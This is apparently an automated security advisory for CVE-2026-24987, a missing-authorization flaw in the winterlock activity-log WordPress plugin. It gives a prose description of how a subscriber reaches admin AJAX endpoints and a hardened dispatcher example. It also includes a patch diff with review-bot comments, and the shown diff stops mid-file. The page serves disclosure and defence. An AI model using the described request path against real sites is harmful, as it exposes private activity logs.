Atomic Edge Proof of Concept automated generator using AI diff analysis
Published: April 6, 2026

CVE-2026-24987: Activity Log for WordPress <= 1.2.7 – Missing Authorization (winterlock)

Plugin: winterlock
Severity: Medium (CVSS 4.3)
CWE: 862
Vulnerable Version: 1.2.7
Patched Version: 1.2.8
Disclosed: March 16, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-24987:
The Activity Log for WordPress plugin, versions up to and including 1.2.7, contains a missing authorization vulnerability. This flaw allows authenticated attackers with Subscriber-level permissions or higher to perform administrative actions. The vulnerability affects multiple AJAX endpoints within the plugin’s controller classes.

Atomic Edge research identifies the root cause as the absence of capability checks and nonce verification in several public datatable() and filter-related functions. The vulnerable functions are located in the plugin’s controller files within the winterlock/application/controllers/ directory. Specifically, the datatable() functions in Wal_cloudintegration.php (line 277), Wal_controlsecurity.php (line 17), Wal_disabledlogs.php (line 17), Wal_history.php (line 71), Wal_logalerts.php (line 17), Wal_reports.php (line 129), Wal_usersessions.php (line 27), and Winteractivitylog.php (line 79) lacked authorization controls. The filter_save(), filter_get(), and filter_remove() functions in Wal_history.php and Winteractivitylog.php were also affected.

Exploitation occurs via WordPress’s admin-ajax.php endpoint. An attacker with a valid WordPress authentication cookie sends a POST request to /wp-admin/admin-ajax.php with the action parameter set to winter_activity_log_action. The request includes additional parameters: page specifying the controller (e.g., wal_history) and function specifying the vulnerable method (e.g., datatable). The attacker can access log data, manage filters, and perform other administrative operations without proper permissions.

The patch adds two security controls to each vulnerable function. First, a capability check, if ( ! current_user_can( 'administrator' ) ) { exit(); }, restricts access to administrators only. Second, a nonce verification, check_ajax_referer( 'winterlock_secure_ajax', 'winterlock_secure' ), rejects requests that do not carry a valid nonce and so prevents CSRF. The patch also updates the corresponding view files so that their AJAX requests include the nonce, as seen in the JavaScript modifications across multiple index.php files.

Successful exploitation grants Subscriber-level users unauthorized access to sensitive activity log data, including user sessions, security controls, reports, and cloud integration settings. Attackers can view, filter, save, and remove log entries. They can also manipulate alert configurations and export sensitive data. This vulnerability enables privilege escalation within the plugin’s context, potentially exposing internal system information and user behavior analytics.
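The routing pattern described above (one admin-ajax.php action, with page and function request parameters selecting the controller method) is what let every unguarded public method become reachable. The following is an added example, not code from the winterlock plugin: a single dispatcher for that pattern in which the nonce check, an explicit route allowlist and a capability check run once, centrally, before any controller method is invoked. It assumes it is loaded inside WordPress (current_user_can, check_ajax_referer, wp_send_json_error, wp_send_json, sanitize_key and add_action are WordPress core functions). The action name winter_activity_log_action and the nonce action and field names come from the advisory; the route table, the Wal_Example_History class, its sample payload and the wal_example_* helpers are hypothetical.

```php
<?php
/*
 * Added example, not the winterlock plugin's own code. Assumes WordPress
 * is loaded. Action and nonce names are taken from the advisory; the
 * route table, controller class and helper names are hypothetical.
 */

const WAL_EXAMPLE_NONCE_ACTION = 'winterlock_secure_ajax';
const WAL_EXAMPLE_NONCE_FIELD  = 'winterlock_secure';

// Hypothetical controller standing in for the plugin's Wal_history class.
class Wal_Example_History {
    public function datatable() {
        // Constructed sample payload in the DataTables server-side format.
        wp_send_json( [
            'draw'            => 1,
            'recordsTotal'    => 1,
            'recordsFiltered' => 1,
            'data'            => [ [ 'id' => 1, 'description' => 'example entry' ] ],
        ] );
    }
    public function filter_get() {
        wp_send_json( [ 'success' => true, 'results' => [] ] );
    }
}

// Hypothetical loader mapping the 'page' parameter to a controller class.
function wal_example_load_controller( $page ) {
    $classes = [ 'wal_history' => Wal_Example_History::class ];
    return isset( $classes[ $page ] ) ? new $classes[ $page ]() : null;
}

// Vulnerable shape, for contrast only (not registered on any hook):
// whatever 'page' and 'function' the request names is invoked, with no
// allowlist, no capability check and no nonce verification.
function wal_example_dispatch_vulnerable() {
    $page       = sanitize_key( $_REQUEST['page'] ?? '' );
    $function   = sanitize_key( $_REQUEST['function'] ?? '' );
    $controller = wal_example_load_controller( $page );
    if ( $controller && method_exists( $controller, $function ) ) {
        $controller->$function();
    }
    wp_die();
}

// Explicit route table: controller => [ method => required capability ].
// Only pairs listed here are reachable through admin-ajax.php at all.
function wal_example_routes() {
    return [
        'wal_history' => [
            'datatable'  => 'manage_options',
            'filter_get' => 'manage_options',
        ],
    ];
}

// Hardened shape: every check happens here, once, before dispatch.
function wal_example_dispatch_hardened() {
    // 1. CSRF: verify the nonce first. The third argument (false) stops
    //    check_ajax_referer() from dying with an empty body, so a proper
    //    403 JSON error can be returned instead.
    if ( ! check_ajax_referer( WAL_EXAMPLE_NONCE_ACTION, WAL_EXAMPLE_NONCE_FIELD, false ) ) {
        wp_send_json_error( [ 'message' => 'invalid or missing nonce' ], 403 );
    }

    $page     = sanitize_key( $_REQUEST['page'] ?? '' );
    $function = sanitize_key( $_REQUEST['function'] ?? '' );
    $routes   = wal_example_routes();

    // 2. Allowlist: unknown controller/method pairs are rejected before any
    //    class is instantiated or any method name is reflected on.
    if ( ! isset( $routes[ $page ][ $function ] ) ) {
        wp_send_json_error( [ 'message' => 'unknown route' ], 404 );
    }

    // 3. Authorization: test a capability rather than a role name, as the
    //    WordPress documentation recommends.
    if ( ! current_user_can( $routes[ $page ][ $function ] ) ) {
        wp_send_json_error( [ 'message' => 'forbidden' ], 403 );
    }

    $controller = wal_example_load_controller( $page );
    $controller->$function();
    wp_die();
}

// Register on the logged-in hook only (no wp_ajax_nopriv_ variant), using
// the action name the advisory cites.
add_action( 'wp_ajax_winter_activity_log_action', 'wal_example_dispatch_hardened' );
```

On the client side the request must carry the nonce in the winterlock_secure field, generated with wp_create_nonce( 'winterlock_secure_ajax' ), as the patched view files do; emitting that value once (for example through wp_localize_script) rather than inlining it at every call site keeps a future call site from omitting it. Returning a JSON error with a 403 or 404 status, instead of a bare exit(), gives the DataTables client something to display and gives server logs a status that monitoring can alert on.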

Differential between vulnerable and patched code

Below is a differential between the unpatched vulnerable code and the patched update, for reference.

Code Diff
--- a/winterlock/application/controllers/Wal_cloudintegration.php
+++ b/winterlock/application/controllers/Wal_cloudintegration.php
@@ -277,6 +277,14 @@
 	// json for datatables
 	public function datatable()
 	{
+
+        if ( ! current_user_can( 'administrator' ) ) {
+            exit();
+        }
+
+        check_ajax_referer('winterlock_secure_ajax', 'winterlock_secure');
+
+
         //$this->enable_error_reporting();
         remove_action( 'shutdown', 'wp_ob_end_flush_all', 1 );
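Review bot: the guard added at the top of datatable() tests a role name, current_user_can( 'administrator' ), rather than a capability; WordPress documents role-name checks as supported only in part and discouraged, and the conventional form for an admin-only endpoint is current_user_can( 'manage_options' ). The bare exit() also returns an empty 200 body, which the DataTables client will report as a JSON parse error and which leaves server logs nothing to distinguish from success; wp_send_json_error( null, 403 ) would give both the caller and any monitoring a meaningful status. This same two-check block is pasted into every controller touched by the patch, so a single helper invoked by the action dispatcher would guarantee that the next method added cannot miss it.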

--- a/winterlock/application/controllers/Wal_controlsecurity.php
+++ b/winterlock/application/controllers/Wal_controlsecurity.php
@@ -17,6 +17,12 @@
 	// json for datatables
 	public function datatable()
 	{
+        if ( ! current_user_can( 'administrator' ) ) {
+            exit();
+        }
+
+        check_ajax_referer('winterlock_secure_ajax', 'winterlock_secure');
+
         //$this->enable_error_reporting();
         remove_action( 'shutdown', 'wp_ob_end_flush_all', 1 );

--- a/winterlock/application/controllers/Wal_disabledlogs.php
+++ b/winterlock/application/controllers/Wal_disabledlogs.php
@@ -17,6 +17,12 @@
 	// json for datatables
 	public function datatable()
 	{
+        if ( ! current_user_can( 'administrator' ) ) {
+            exit();
+        }
+
+        check_ajax_referer('winterlock_secure_ajax', 'winterlock_secure');
+
         //$this->enable_error_reporting();
         remove_action( 'shutdown', 'wp_ob_end_flush_all', 1 );

--- a/winterlock/application/controllers/Wal_history.php
+++ b/winterlock/application/controllers/Wal_history.php
@@ -71,6 +71,13 @@
 	// json for datatables
 	public function datatable()
 	{
+
+        if ( ! current_user_can( 'administrator' ) ) {
+            exit();
+        }
+
+        check_ajax_referer('winterlock_secure_ajax', 'winterlock_secure');
+
         //$this->enable_error_reporting();
         remove_action( 'shutdown', 'wp_ob_end_flush_all', 1 );

@@ -244,6 +251,12 @@
     }

     public function filter_save ($id = NULL, $redirect='1') {
+        if ( ! current_user_can( 'administrator' ) ) {
+            exit();
+        }
+
+        check_ajax_referer('winterlock_secure_ajax', 'winterlock_secure');
+
         if(!wal_access_allowed('winterlock_logs'))
         {
             exit();
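Review bot: filter_save() now runs the administrator check ahead of the pre-existing wal_access_allowed('winterlock_logs') check, so the latter can no longer grant anything the former did not. If 'winterlock_logs' was meant as a delegable, finer-grained permission, this hunk silently collapses it to administrator-only; if it was not, the second check is now dead code. Either way the intended permission model should be stated in the commit message, and the same question applies to filter_get() and filter_remove() below.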
@@ -291,6 +304,12 @@


     public function filter_get ($id = NULL, $redirect='1') {
+        if ( ! current_user_can( 'administrator' ) ) {
+            exit();
+        }
+
+        check_ajax_referer('winterlock_secure_ajax', 'winterlock_secure');
+
         if(!wal_access_allowed('winterlock_logs'))
         {
             exit();
@@ -328,6 +347,12 @@
     }

     public function filter_remove ($id = NULL, $redirect='1') {
+        if ( ! current_user_can( 'administrator' ) ) {
+            exit();
+        }
+
+        check_ajax_referer('winterlock_secure_ajax', 'winterlock_secure');
+
         if(!wal_access_allowed('winterlock_logs'))
         {
             exit();
@@ -351,7 +376,7 @@
             update_option($name_val, $options);
         }

-        $ajax_output['results'] = $results;
+        $ajax_output['results'] = $results ?? '';
         $ajax_output['success'] = true;
         $json_output = json_encode($ajax_output);
         //$length = mb_strlen($json_output);
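Review bot: the $results ?? '' fallback is a behavioural change unrelated to the authorization fix and belongs in a separate commit; it also raises the plugin's minimum PHP version to 7.0, which the readme should reflect. The visible lines set $ajax_output['success'] = true unconditionally right after, so a filter_remove() call that reaches this point without ever assigning $results now reports success with an empty result instead of raising a notice; if that path exists, success should be tied to whether the removal actually happened.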
--- a/winterlock/application/controllers/Wal_logalerts.php
+++ b/winterlock/application/controllers/Wal_logalerts.php
@@ -17,6 +17,13 @@
 	// json for datatables
 	public function datatable()
 	{
+
+        if ( ! current_user_can( 'administrator' ) ) {
+            exit();
+        }
+
+        check_ajax_referer('winterlock_secure_ajax', 'winterlock_secure');
+
         //$this->enable_error_reporting();
         remove_action( 'shutdown', 'wp_ob_end_flush_all', 1 );

--- a/winterlock/application/controllers/Wal_reports.php
+++ b/winterlock/application/controllers/Wal_reports.php
@@ -129,6 +129,13 @@
 	// json for datatables
 	public function datatable()
 	{
+
+        if ( ! current_user_can( 'administrator' ) ) {
+            exit();
+        }
+
+        check_ajax_referer('winterlock_secure_ajax', 'winterlock_secure');
+
         //$this->enable_error_reporting();
         remove_action( 'shutdown', 'wp_ob_end_flush_all', 1 );

--- a/winterlock/application/controllers/Wal_usersessions.php
+++ b/winterlock/application/controllers/Wal_usersessions.php
@@ -27,6 +27,13 @@
     */
 	public function datatable()
 	{
+
+        if ( ! current_user_can( 'administrator' ) ) {
+            exit();
+        }
+
+        check_ajax_referer('winterlock_secure_ajax', 'winterlock_secure');
+
         //$this->enable_error_reporting();
         remove_action( 'shutdown', 'wp_ob_end_flush_all', 1 );

--- a/winterlock/application/controllers/Winteractivitylog.php
+++ b/winterlock/application/controllers/Winteractivitylog.php
@@ -79,6 +79,13 @@
 	// json for datatables
 	public function datatable()
 	{
+
+        if ( ! current_user_can( 'administrator' ) ) {
+            exit();
+        }
+
+        check_ajax_referer('winterlock_secure_ajax', 'winterlock_secure');
+
         //$this->enable_error_reporting();
         remove_action( 'shutdown', 'wp_ob_end_flush_all', 1 );

@@ -249,6 +256,11 @@
     }

     public function filter_save ($id = NULL, $redirect='1') {
+        if ( ! current_user_can( 'administrator' ) ) {
+            exit();
+        }
+
+        check_ajax_referer('winterlock_secure_ajax', 'winterlock_secure');
         if(!wal_access_allowed('winterlock_logs'))
         {
             exit();
@@ -296,6 +308,12 @@


     public function filter_get ($id = NULL, $redirect='1') {
+        if ( ! current_user_can( 'administrator' ) ) {
+            exit();
+        }
+
+        check_ajax_referer('winterlock_secure_ajax', 'winterlock_secure');
+
         if(!wal_access_allowed('winterlock_logs'))
         {
             exit();
@@ -333,6 +351,12 @@
     }

     public function filter_remove ($id = NULL, $redirect='1') {
+        if ( ! current_user_can( 'administrator' ) ) {
+            exit();
+        }
+
+        check_ajax_referer('winterlock_secure_ajax', 'winterlock_secure');
+
         if(!wal_access_allowed('winterlock_logs'))
         {
             exit();
--- a/winterlock/application/views/wal_cloudintegration/index.php
+++ b/winterlock/application/views/wal_cloudintegration/index.php
@@ -17,9 +17,19 @@

 <div class="wrap winterlock_wrap">

-<h1><?php echo __('Cloud integration', 'winter-activity-log'); ?>
-<a href="<?php menu_page_url( 'wal_cloudintegration', true ); ?>&function=cloud_edit" class="page-title-action"><i class="fa fa-plus"></i>  <?php echo __('Add New Papertrail Cloud','sw_win')?></a>
-<a href="<?php menu_page_url( 'wal_cloudintegration', true ); ?>&function=mysql_edit" class="page-title-action"><i class="fa fa-plus"></i>  <?php echo __('Add New External MySQL Connection','sw_win')?></a>
+<h1><?php
+echo __( 'Cloud integration', 'winter-activity-log' );
+?>
+<a href="<?php
+menu_page_url( 'wal_cloudintegration', true );
+?>&function=cloud_edit" class="page-title-action"><i class="fa fa-plus"></i>  <?php
+echo __( 'Add New Papertrail Cloud', 'sw_win' );
+?></a>
+<a href="<?php
+menu_page_url( 'wal_cloudintegration', true );
+?>&function=mysql_edit" class="page-title-action"><i class="fa fa-plus"></i>  <?php
+echo __( 'Add New External MySQL Connection', 'sw_win' );
+?></a>

 </h1>
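Review bot: this hunk, and those that follow in the same file, reflow single-line <?php echo __( ... ); ?> tags onto several lines without changing behaviour; a coding-style rewrite of this size buries the one security-relevant line in the file (the winterlock_secure nonce added to the DataTables ajax data further down) and should go in its own commit so the security change can be reviewed on its own.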

@@ -27,7 +37,9 @@
 <div class="winterlock_wrap">
     <div class="panel panel-default">
         <div class="panel-heading">
-            <h3 class="panel-title"><?php echo __('Manage Cloud integration Data','winter-activity-log'); ?></h3>
+            <h3 class="panel-title"><?php
+echo __( 'Manage Cloud integration Data', 'winter-activity-log' );
+?></h3>
         </div>
         <div class="panel-body">

@@ -38,9 +50,15 @@
                         <thead>
                             <tr>
                                 <th data-priority="1">#</th>
-                                <th data-priority="2"><?php echo __('Title', 'winter-activity-log'); ?></th>
-                                <th data-priority="3"><?php echo __('Component', 'winter-activity-log'); ?></th>
-                                <th data-priority="4"><?php echo __('Program name', 'winter-activity-log'); ?></th>
+                                <th data-priority="2"><?php
+echo __( 'Title', 'winter-activity-log' );
+?></th>
+                                <th data-priority="3"><?php
+echo __( 'Component', 'winter-activity-log' );
+?></th>
+                                <th data-priority="4"><?php
+echo __( 'Program name', 'winter-activity-log' );
+?></th>
                                 <th data-priority="5"><i class="glyphicon glyphicon-edit"></i></th>
                                 <th><input type="checkbox" class="selectAll" name="selectAll" value="all"></th>
                             </tr>
@@ -62,37 +80,42 @@
                 </div>
             </div>
             <div class="footer-btns">
-                <a href="#bulk_remove-form" id="bulk_remove" class="btn btn-danger pull-right popup-with-form"><i class="fa fa-remove"></i>  <?php echo __('Bulk remove','winter-activity-log')?><i class="fa fa-spinner fa-spin fa-custom-ajax-indicator-opc ajax-indicator-masking hidden_opacity"></i></a>
-                <a href="#clear_filters" id="clear_filters" class="btn btn-danger pull-right "><i class="fa fa-trash"></i>  <?php echo __('Clear all filters','winter-activity-log')?></a>
+                <a href="#bulk_remove-form" id="bulk_remove" class="btn btn-danger pull-right popup-with-form"><i class="fa fa-remove"></i>  <?php
+echo __( 'Bulk remove', 'winter-activity-log' );
+?><i class="fa fa-spinner fa-spin fa-custom-ajax-indicator-opc ajax-indicator-masking hidden_opacity"></i></a>
+                <a href="#clear_filters" id="clear_filters" class="btn btn-danger pull-right "><i class="fa fa-trash"></i>  <?php
+echo __( 'Clear all filters', 'winter-activity-log' );
+?></a>
             </div>
         </div>
     </div>

-    <div class="alert alert-info" role="alert"><?php echo __('Here you can configure cloud loging to Papertrail app', 'winter-activity-log'); ?></div>
+    <div class="alert alert-info" role="alert"><?php
+echo __( 'Here you can configure cloud loging to Papertrail app', 'winter-activity-log' );
+?></div>

     <?php
-    if ( winteractivitylog()->is__premium_only() ) {
-    if ( !winteractivitylog()->is_plan_or_trial('premium') ){ ?>
-        <div class="alert alert-danger" role="alert"><?php echo __('Min. premium package is required for cloud integration', 'winter-activity-log'); ?></div>
-    <?php }} ?>
+?>

-    <?php if(get_option('wal_checkbox_disable_hints', '0') == '0'): ?>
+    <?php
+if ( get_option( 'wal_checkbox_disable_hints', '0' ) == '0' ) {
+    ?>

     <iframe width="560" height="315" src="https://www.youtube.com/embed/4QvmA3HkdDY" frameborder="0" allow="accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe>

-    <?php endif; ?>
+    <?php
+}
+?>
 </div>
 </div>



-<?php
-
-wp_enqueue_style('winter-activity-log_basic_wrapper');
+<?php
+wp_enqueue_style( 'winter-activity-log_basic_wrapper' );
 wp_enqueue_script( 'datatables' );
 wp_enqueue_script( 'dataTables-responsive' );
 wp_enqueue_script( 'dataTables-select' );
-
 wp_enqueue_style( 'dataTables-select' );
 ?>
 <script>
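Review bot: beyond reflowing, this hunk deletes the is__premium_only() / is_plan_or_trial('premium') block together with the 'Min. premium package is required for cloud integration' notice, which is a licensing and UI change unrelated to CVE-2026-24987; it deserves its own changelog entry or a separate commit so that the security release is reviewable in isolation.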
@@ -120,14 +143,18 @@
         load_indicator_opc.removeClass('hidden_opacity');
         if(count == 0)
         {
-            alert('<?php echo esc_attr__('Please select reports to remove', 'winter-activity-log'); ?>');
+            alert('<?php
+echo esc_attr__( 'Please select reports to remove', 'winter-activity-log' );
+?>');
             load_indicator_opc.addClass('hidden_opacity');
             return false;
         }
         else
         {

-            if(confirm('<?php esc_js(__('Are you sure?', 'winter-activity-log')); ?>'))
+            if(confirm('<?php
+esc_js( __( 'Are you sure?', 'winter-activity-log' ) );
+?>'))
             {
                 $('img#ajax-indicator-masking').show();
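Review bot: the reflowed confirm() string still reads <?php esc_js( __( 'Are you sure?', 'winter-activity-log' ) ); ?> with no echo, so esc_js() returns the text and nothing is printed, leaving confirm('') at runtime; the alert() a few lines above does echo its esc_attr__() result. Since the patch rewrites these lines anyway, add the missing echo: <?php echo esc_js( __( 'Are you sure?', 'winter-activity-log' ) ); ?>.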

@@ -135,7 +162,11 @@
                 var ids = table.rows( { selected: true } ).data().pluck( 'idcloud' ).toArray();

                 // ajax to remove rows
-                $.post('<?php menu_page_url( 'wal_cloudintegration', true ); ?>&function=bulk_remove&_wpnonce=<?php echo esc_js(wp_create_nonce( 'winteractivitylog-bulk'));?>', { cloud_ids: ids }, function(data) {
+                $.post('<?php
+menu_page_url( 'wal_cloudintegration', true );
+?>&function=bulk_remove&_wpnonce=<?php
+echo esc_js( wp_create_nonce( 'winteractivitylog-bulk' ) );
+?>', { cloud_ids: ids }, function(data) {

                     $('img#ajax-indicator-masking').hide();

@@ -169,18 +200,27 @@
                     return $.extend( {}, d, {
                         "page": 'wal_cloudintegration',
                         "function": 'datatable',
-                        "action": 'winter_activity_log_action'
+                        "action": 'winter_activity_log_action',
+                        "winterlock_secure": '<?php
+echo esc_js( wp_create_nonce( 'winterlock_secure_ajax' ) );
+?>'
                     } );
                 }
             },
             "language": {
-                search: "<?php esc_js(__('Search', 'winter-activity-log')); ?>",
-                searchPlaceholder: "<?php esc_js(__('Enter here filter tag for any column', 'winter-activity-log')); ?>"
+                search: "<?php
+esc_js( __( 'Search', 'winter-activity-log' ) );
+?>",
+                searchPlaceholder: "<?php
+esc_js( __( 'Enter here filter tag for any column', 'winter-activity-log' ) );
+?>"
             },
             "fnDrawCallback": function (oSettings){
                 $('a.delete_button').click(function(){

-                    if(confirm('<?php esc_js(__('Are you sure?', 'winter-activity-log')); ?>'))
+                    if(confirm('<?php
+esc_js( __( 'Are you sure?', 'winter-activity-log' ) );
+?>'))
                     {
                        // ajax to remove row
                         $.post($(this).attr('href'), function( [] ) {
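Review bot: adding "winterlock_secure" to the DataTables ajax data is the correct client-side half of the fix and matches the server's check_ajax_referer() call. Two points: the nonce is rendered into the page at load time, so a tab left open past the nonce lifetime will start receiving the server's empty exit() response with no error the table can display, which argues for a JSON error with a status code on the server side; and the search, searchPlaceholder and confirm() strings in this hunk have no echo before esc_js(), so they evaluate to empty strings.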
@@ -274,11 +314,21 @@
 					'sPrevious': '<i class="fa fa-angle-left"></i>',
 					'sNext': '<i class="fa fa-angle-right"></i>'
 				},
-                'sSearch': "<?php esc_js(__('Search', 'winter-activity-log')); ?>",
-                "sLengthMenu": "<?php esc_js(__('Show _MENU_ entries', 'winter-activity-log')); ?>",
-                "sInfoEmpty": "<?php esc_js(__('Showing 0 to 0 of 0 entries', 'winter-activity-log')); ?>",
-                "sInfo": "<?php esc_js( __('Showing _START_ to _END_ of _TOTAL_ entries', 'winter-activity-log')); ?>",
-                "sEmptyTable": "<?php esc_js(__('No data available in table', 'winter-activity-log')); ?>",
+                'sSearch': "<?php
+esc_js( __( 'Search', 'winter-activity-log' ) );
+?>",
+                "sLengthMenu": "<?php
+esc_js( __( 'Show _MENU_ entries', 'winter-activity-log' ) );
+?>",
+                "sInfoEmpty": "<?php
+esc_js( __( 'Showing 0 to 0 of 0 entries', 'winter-activity-log' ) );
+?>",
+                "sInfo": "<?php
+esc_js( __( 'Showing _START_ to _END_ of _TOTAL_ entries', 'winter-activity-log' ) );
+?>",
+                "sEmptyTable": "<?php
+esc_js( __( 'No data available in table', 'winter-activity-log' ) );
+?>",
 			},
 			'dom': "<'row'<'col-sm-7 col-md-5'f><'col-sm-5 col-md-6'l>>" + "<'row'<'col-sm-12'tr>>" + "<'row'<'col-sm-5'i><'col-sm-7'p>>"
 		});
--- a/winterlock/application/views/wal_controlsecurity/index.php
+++ b/winterlock/application/views/wal_controlsecurity/index.php
@@ -176,7 +176,8 @@
                     return $.extend( {}, d, {
                         "page": 'wal_controlsecurity',
                         "function": 'datatable',
-                        "action": 'winter_activity_log_action'
+                        "action": 'winter_activity_log_action',
+                        "winterlock_secure": '<?php echo esc_js(wp_create_nonce( 'winterlock_secure_ajax' ));?>'
                     } );
                 }
             },
--- a/winterlock/application/views/wal_disabledlogs/index.php
+++ b/winterlock/application/views/wal_disabledlogs/index.php
@@ -170,7 +170,8 @@
                     return $.extend( {}, d, {
                         "page": 'wal_disabledlogs',
                         "function": 'datatable',
-                        "action": 'winter_activity_log_action'
+                        "action": 'winter_activity_log_action',
+                        "winterlock_secure": '<?php echo esc_js(wp_create_nonce( 'winterlock_secure_ajax' ));?>'
                     } );
                 }
             },
--- a/winterlock/application/views/wal_history/index.php
+++ b/winterlock/application/views/wal_history/index.php
@@ -241,6 +241,7 @@
             "page": 'wal_history',
             'function': 'filter_get',
             "action": 'winter_activity_log_action',
+            "winterlock_secure": '<?php echo esc_js(wp_create_nonce( 'winterlock_secure_ajax' ));?>'
         };

         $.post('<?php echo esc_url(admin_url( 'admin-ajax.php' ));?>', data,
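Review bot: the nonce is now sent with filter_get, and the hunks below add it to filter_remove, filter_save and the datatable request, which matches the server-side check_ajax_referer('winterlock_secure_ajax', 'winterlock_secure'). Each call site inlines its own wp_create_nonce( 'winterlock_secure_ajax' ), though; emitting it once (for example via wp_localize_script) and referencing that variable at every $.post would make it impossible for a future call site to omit the field.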
@@ -294,6 +295,7 @@
                     'function': 'filter_remove',
                     "action": 'winter_activity_log_action',
                     "filter_id": $(this).attr('data-fielderid') || '',
+                    "winterlock_secure": '<?php echo esc_js(wp_create_nonce( 'winterlock_secure_ajax' ));?>'
                 };
                 sw_log_notify('<?php echo __('Removing filter', 'winter-activity-log'); ?> '+title, 'loading');

@@ -349,7 +351,8 @@
                             'function': 'filter_save',
                             "action": 'winter_activity_log_action',
                             "filter_name": filter_name,
-                            "filter_param": generate_json_filter()
+                            "filter_param": generate_json_filter(),
+                             "winterlock_secure": '<?php echo esc_js(wp_create_nonce( 'winterlock_secure_ajax' ));?>'
                         };

                         $.post('<?php echo esc_url(admin_url( 'admin-ajax.php' ));?>', data,
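Review bot: the added "winterlock_secure" line is indented one space deeper than its sibling keys; align it with "filter_param" above so the object literal reads consistently.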
@@ -480,7 +483,8 @@
                 return $.extend( {}, d, {
                     "page": 'wal_history',
                     "function": 'datatable',
-                    "action": 'winter_activity_log_action'
+                    "action": 'winter_activity_log_action',
+                    "winterlock_secure": '<?php echo esc_js(wp_create_nonce( 'winterlock_secure_ajax' ));?>'
                 } );


--- a/winterlock/application/views/wal_logalerts/index.php
+++ b/winterlock/application/views/wal_logalerts/index.php
@@ -170,7 +170,8 @@
                     return $.extend( {}, d, {
                         "page": 'wal_logalerts',
                         "function": 'datatable',
-                        "action": 'winter_activity_log_action'
+                        "action": 'winter_activity_log_action',
+                        "winterlock_secure": '<?php echo esc_js(wp_create_nonce( 'winterlock_secure_ajax' ));?>'
                     } );
                 }
             },
--- a/winterlock/application/views/wal_reports/index.php
+++ b/winterlock/application/views/wal_reports/index.php
@@ -17,13 +17,21 @@

 <div class="wrap winterlock_wrap">

-<h1><?php echo __('Reports','winter-activity-log'); ?> <a href="<?php menu_page_url( 'wal_reports', true ); ?>&function=report_edit" class="page-title-action"><i class="fa fa-plus"></i>  <?php echo __('Add New','sw_win')?></a></h1>
+<h1><?php
+echo __( 'Reports', 'winter-activity-log' );
+?> <a href="<?php
+menu_page_url( 'wal_reports', true );
+?>&function=report_edit" class="page-title-action"><i class="fa fa-plus"></i>  <?php
+echo __( 'Add New', 'sw_win' );
+?></a></h1>


 <div class="winterlock_wrap">
     <div class="panel panel-default">
         <div class="panel-heading">
-            <h3 class="panel-title"><?php echo __('Manage Reports Data','winter-activity-log'); ?></h3>
+            <h3 class="panel-title"><?php
+echo __( 'Manage Reports Data', 'winter-activity-log' );
+?></h3>
         </div>
         <div class="panel-body">

@@ -34,10 +42,18 @@
                         <thead>
                             <tr>
                                 <th data-priority="1">#</th>
-                                <th data-priority="2"><?php echo __('Name', 'winter-activity-log'); ?></th>
-                                <th data-priority="3"><?php echo __('Email', 'winter-activity-log'); ?></th>
-                                <th data-priority="4"><?php echo __('Scheduling period', 'winter-activity-log'); ?></th>
-                                <th data-priority="5"><?php echo __('Format', 'winter-activity-log'); ?></th>
+                                <th data-priority="2"><?php
+echo __( 'Name', 'winter-activity-log' );
+?></th>
+                                <th data-priority="3"><?php
+echo __( 'Email', 'winter-activity-log' );
+?></th>
+                                <th data-priority="4"><?php
+echo __( 'Scheduling period', 'winter-activity-log' );
+?></th>
+                                <th data-priority="5"><?php
+echo __( 'Format', 'winter-activity-log' );
+?></th>
                                 <th data-priority="6"><i class="glyphicon glyphicon-search"></i></th>
                                 <th><input type="checkbox" class="selectAll" name="selectAll" value="all"></th>
                             </tr>
@@ -60,38 +76,43 @@
                 </div>
             </div>
             <div class="footer-btns">
-                <a href="#bulk_remove-form" id="bulk_remove" class="btn btn-danger pull-right popup-with-form"><i class="fa fa-remove"></i>  <?php echo __('Bulk remove','winter-activity-log')?><i class="fa fa-spinner fa-spin fa-custom-ajax-indicator-opc ajax-indicator-masking hidden_opacity"></i></a>
-                <a href="#clear_filters" id="clear_filters" class="btn btn-danger pull-right "><i class="fa fa-trash"></i>  <?php echo __('Clear all filters','winter-activity-log')?></a>
+                <a href="#bulk_remove-form" id="bulk_remove" class="btn btn-danger pull-right popup-with-form"><i class="fa fa-remove"></i>  <?php
+echo __( 'Bulk remove', 'winter-activity-log' );
+?><i class="fa fa-spinner fa-spin fa-custom-ajax-indicator-opc ajax-indicator-masking hidden_opacity"></i></a>
+                <a href="#clear_filters" id="clear_filters" class="btn btn-danger pull-right "><i class="fa fa-trash"></i>  <?php
+echo __( 'Clear all filters', 'winter-activity-log' );
+?></a>
             </div>
         </div>
     </div>

-    <div class="alert alert-info" role="alert"><?php echo __('Here you can define regular or scheduling reports', 'winter-activity-log'); ?></div>
+    <div class="alert alert-info" role="alert"><?php
+echo __( 'Here you can define regular or scheduling reports', 'winter-activity-log' );
+?></div>

     <?php
-    if ( winteractivitylog()->is__premium_only() ) {
-    if ( !winteractivitylog()->is_plan_or_trial('standard') ){ ?>
-        <div class="alert alert-danger" role="alert"><?php echo __('Min. standard package is required for log repors', 'winter-activity-log'); ?></div>
-    <?php }} ?>
+?>

-    <?php if(get_option('wal_checkbox_disable_hints', '0') == '0'): ?>
+    <?php
+if ( get_option( 'wal_checkbox_disable_hints', '0' ) == '0' ) {
+    ?>

     <iframe width="560" height="315" src="https://www.youtube.com/embed/YF2VesF1NC8" frameborder="0" allow="accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe>

-    <?php endif; ?>
+    <?php
+}
+?>

 </div>
 </div>



-<?php
-
-wp_enqueue_style('winter-activity-log_basic_wrapper');
+<?php
+wp_enqueue_style( 'winter-activity-log_basic_wrapper' );
 wp_enqueue_script( 'datatables' );
 wp_enqueue_script( 'dataTables-responsive' );
 wp_enqueue_script( 'dataTables-select' );
-
 wp_enqueue_style( 'dataTables-select' );
 ?>
 <script>
@@ -119,14 +140,18 @@
         load_indicator_opc.removeClass('hidden_opacity');
         if(count == 0)
         {
-            alert('<?php echo esc_attr__('Please select reports to remove', 'winter-activity-log'); ?>');
+            alert('<?php
+echo esc_attr__( 'Please select reports to remove', 'winter-activity-log' );
+?>');
             load_indicator_opc.addClass('hidden_opacity');
             return false;
         }
         else
         {

-            if(confirm('<?php esc_js(__('Are you sure?', 'winter-activity-log')); ?>'))
+            if(confirm('<?php
+esc_js( __( 'Are you sure?', 'winter-activity-log' ) );
+?>'))
             {
                 $('img#ajax-indicator-masking').show();

@@ -134,7 +159,11 @@
                 var ids = table.rows( { selected: true } ).data().pluck( 'idreport' ).toArray();

                 // ajax to remove rows
